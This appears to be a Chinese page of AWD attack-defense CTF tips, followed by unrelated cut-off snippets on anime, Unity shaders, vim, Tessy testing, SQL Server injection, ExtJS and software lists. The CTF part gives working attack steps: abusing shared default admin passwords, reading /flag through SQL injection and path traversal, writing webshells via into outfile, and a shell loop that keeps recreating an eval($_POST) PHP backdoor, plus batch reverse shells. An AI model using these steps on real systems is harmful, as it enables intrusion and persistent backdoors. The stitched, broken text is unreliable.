1.数据备份
比赛开始第一时间备份,备份网站目录及数据库,一般在 /var/www/html 目录。
一是为了dump下来,用D盾查杀存在的后门;安装sublime全文搜索关键字
二是为了比赛出现异常或恶意破坏进行还原,避免靶机宕机被扣分;
三要审计下有没有高危命令执行函数,进行后期加固,以及有空余时间或专门安排一个人审计下基础漏洞用来做攻击。
命令执行函数 exec()、passthru()、system()、 shell_exec()、popen() 等;代码执行函数:eval()、assert()、preg_repace()、uasort() 等;文件包含函数 include() 、require() 等,用正则匹配 grep -r "@eval" /www/,找到后注释掉。
1.备份源码,注意隐藏文件使用图像化工具连接ssh后,推荐用winscp,准备centos7.9lamp、ubuntu20.04lamp
tar czvf newfile.tar.gz SOURCE 压缩 zxvf
2.备份数据库, 1)本地还原 2)查看后台账号密码 3)查看关闭数据库远程,推荐adminer.php
mysqldump –u root –p mydatabase > mydatabase_out.sql;
3.恢复备份,在mysql终端下执行:
命令格式:source FILE_PATH
source ~/db.sql
或者在shell下执行
shell> mysqldump -h host -u root -p dbname < dbname_backup.sql
2.弱口令
大多数情况下,所有队伍的Web后台、phpmyadmin等服务的管理密码都一样,立马快速检查修改自己密码,并利用此进行攻击。一般默认密码为 admin/admin, admin/123456, test/test,如果被其他队伍改了那就gg了。
3.查找后门
对备份web目录进行后门查杀,脚本获取webshell并快速提交
4.监测攻击payload
tail -f *.log,看日志,不言而喻,抓他们的payload并利用。
5.常见漏洞
常见的漏洞包括SQL注入、文件包含、文件上传、命令执行等。
(1)sql注入漏洞
比赛一般没有防护(除非选手安装了防御脚本),可直接通过 --sql-shell 执行 select load_file(‘/flag’); 得到flag,也可以利用 into outfile 写木马维持权限。
(2)本地文件包含或目录遍历
直接通过 ../../../../../flag 获取。
6.权限维持
(1)不死马
直接linux执行:
while true;do echo '<?php eval($_POST["x"]);?>' > x.php;sleep 1;done
7.防御方法
使用条件竞争的方式,不断循环创建和不死马同名的文件和文件夹
8.批量反弹shell
Reverse Shell Manager
9.批量文件上传
https://github.com/edwardchoijc/ctf-toolkit/tree/master/batch_upload_file
动漫制作技巧是很多新人想了解的问题,今天小编就来解答与大家分享一下动漫制作流程,为了帮助有兴趣的同学理解,大多数人会选择动漫培训机构,那么今天小编就带大家来看看动漫制作要掌握哪些技巧?一、动漫作品首先完成草图设计和原型制作。设计草图要有目的、有对象、有步骤、要形象、要简单、符合实际。设计图要一致性,以保证制作的顺利进行。二、原型制作是根据设计图纸和制作材料,可以是手绘也可以是3d软件创建。在此步骤中,要注意的问题是色彩和平面布局。三、动漫制作制作完成后,加工成型。完成不同的表现形式后,就要对设计稿进行加工处理,使加工的难易度降低,并得到一些基本准确的概念,以便于后续的大样、准确的尺寸制定。四、
写在之前Shader变体、Shader属性定义技巧、自定义材质面板,这三个知识点任何一个单拿出来都是一套知识体系,不能一概而论,本文章目的在于将学习和实际工作中遇见的问题进行总结,类似于网络笔记之用,方便后续回顾查看,如有以偏概全、不祥不尽之处,还望海涵。1、Shader变体先看一段代码......Properties{ [KeywordEnum(on,off)]USL_USE_COL("IsUseColorMixTex?",int)=0 [Toggle(IS_RED_ON)]_IsRed("IsRed?",int)=0}......//中间省略,后续会有完整代码 #pragmamulti_c
我是那些没有在他的任何Ruby/RubyonRails工作中使用TextMate的开发人员之一。我在这个领域的特别忠诚在于vim。您最喜欢将vim与Ruby和/或RubyonRails结合使用以尽可能提高工作效率的提示/技巧是什么? 最佳答案 最重要获取rails.vim的副本它在数百万级别上很棒。Readthedoc.提示太多了,:Rviewcustomer,:RSmodelfoo,:Rinvert,gf,:Rextract,:Rake等等。您可能需要NERDTree以及轻松导航(您可以使用:Rtree访问)第二重要在推特上关注t
最近做了一个平台项目,需要进行动态代码测试,入门了嵌入式单元测试工具Tessy,总结了一些简单的测试技巧。当前网上的教程普遍只写内容概要,真正入手还得自己认真摸索一番。为此,特意总结了一些Tessy测试技巧以供有缘人参考。提几个Tessy工具使用的问题。1.如何导入工程的头文件?2.如何解决文件内存在汇编语言代码分析时候报错的问题?3.如何规避本文件创建却不使用的函数,宏和变量,在执行executetest出现的undefinedreferencetoxx的问题?4.如何创建测试用例testcase?5.为什么testcase的结果输出与期望不一致?6.创建testcase的方法有几种?7.C
目录前言一、SQLServer基础1.SQLServer2012安装启动navicat远程连接2.SQLServer概念数据库的组成数据库中常用对象默认库介绍3.T-SQL语言创建数据库创建表插入数据基础语法总结4.sqlserver权限新建用户并赋予权限权限总结二、Sqlserver手工注入环境搭建注入手法1.联合查询2.报错注入3.布尔盲注4.延时注入三、SQlserver提权getshellxp_cmdshell执行系统命令sp_oacreate执行系统命令使用CLR执行系统命令数据库差异备份写webshell日志差异备份写webshell前言本文详细的介绍了SqlServer安全基础,
不确定这是否属于社区wiki...有人可以提供一些关于如何成功构建不依赖于JavaScript的ASP.NET站点的通用指南吗?我的理解是,我应该首先在没有JavaScript的情况下构建一个功能性网站,并用它来增强用户体验。说起来容易做起来难……除了禁用JavaScript并尝试它之外,我如何才能确保我的网站在没有JavaScript的情况下正常工作?或者这是经验带来的东西? 最佳答案 尝试ASP.NETMVC!当然,大多数示例都使用JavaScript来实现AJAX功能,但是构建一个不使用JavaScript的功能齐全的网站也很
以编程方式关闭ExtJS选项卡的正确方法是什么?我需要在IE6中完成这项工作;尽管从TabPanel中删除选项卡有效,但我看到IE警告:Thispagecontainssecureandunsecureitems...当我单击选项卡上的X时,我没有看到这个警告。所以,当我点击X时,显然发生了一些聪明的事情。注意:警告在我使用tabPanel.remove(aTab,true)时出现,而在我使用tabPanel.remove(aTab,false)时不会出现。因此,混合内容警告会在面板的移除和后续销毁期间显示。模拟标签上的点击是否有意义?编辑IEistellingmeIhavemixed
所以我使用background-size:cover来实现背景图像的预期效果,该背景图像可以缩放到它所应用的任何div大小,同时保持纵横比。为什么要使用这种方法?根据相关WordPress帖子中设置为图像的内容,使用内联CSS动态地通过PHP将图像应用为背景。所以一切都很好,但是是否有任何回退以确保它至少在IE8中工作?可能有一些Javascript修复?已经试过backstretch和supersized,但无济于事,因为它们仅将图像应用于页面背景。您可以在实际中看到它overhere. 最佳答案 在IE8或更低版本中,将前景图像
目录1、火绒安全2、GeekUninstaller 卸载神器3、Potplayer4、Edge微软官方浏览器5、Snipaste 截图神器6、Everything 本地搜索神器7、Honeyview 超好用的图片查看工具8、Bandizip 解压缩工具9、傲梅分区助手 分区必备神器10、ToDesk 远程协助工具11、剪映视频剪辑 自媒体视频剪辑工具今天给大家推荐几款装机必备的电脑软件,你都用过吗?1、火绒安全这是一款功能大、集杀防管控于一体的安全软件,它专业禁止、极致低调,默默守护着你的电脑。它可以拦截几乎所有的弹窗广告,通过访问控制中心,可轻松控制上网的时长,禁止访问特定的网站程序等,同时
所以我是一个相当不错的javascript程序员,我最近刚刚完成了一个相当大的web应用程序的工作,其中涉及编写相当多的javascript。在调试我的脚本时,我遇到的一件事是我在整个脚本中使用的各种全局变量存在一些命名空间冲突。本质上,我的javascript文件的结构如下:globalvaraglobalvarbglobalvarcfunction1(){}function2(){}function3(){}使用jQuery文档就绪函数将各种事件绑定(bind)到我的html中的按钮,并将我的函数调用为事件处理程序回调。有些人建议将我的整个脚本封装在一个巨大的函数中,以防止任何与范
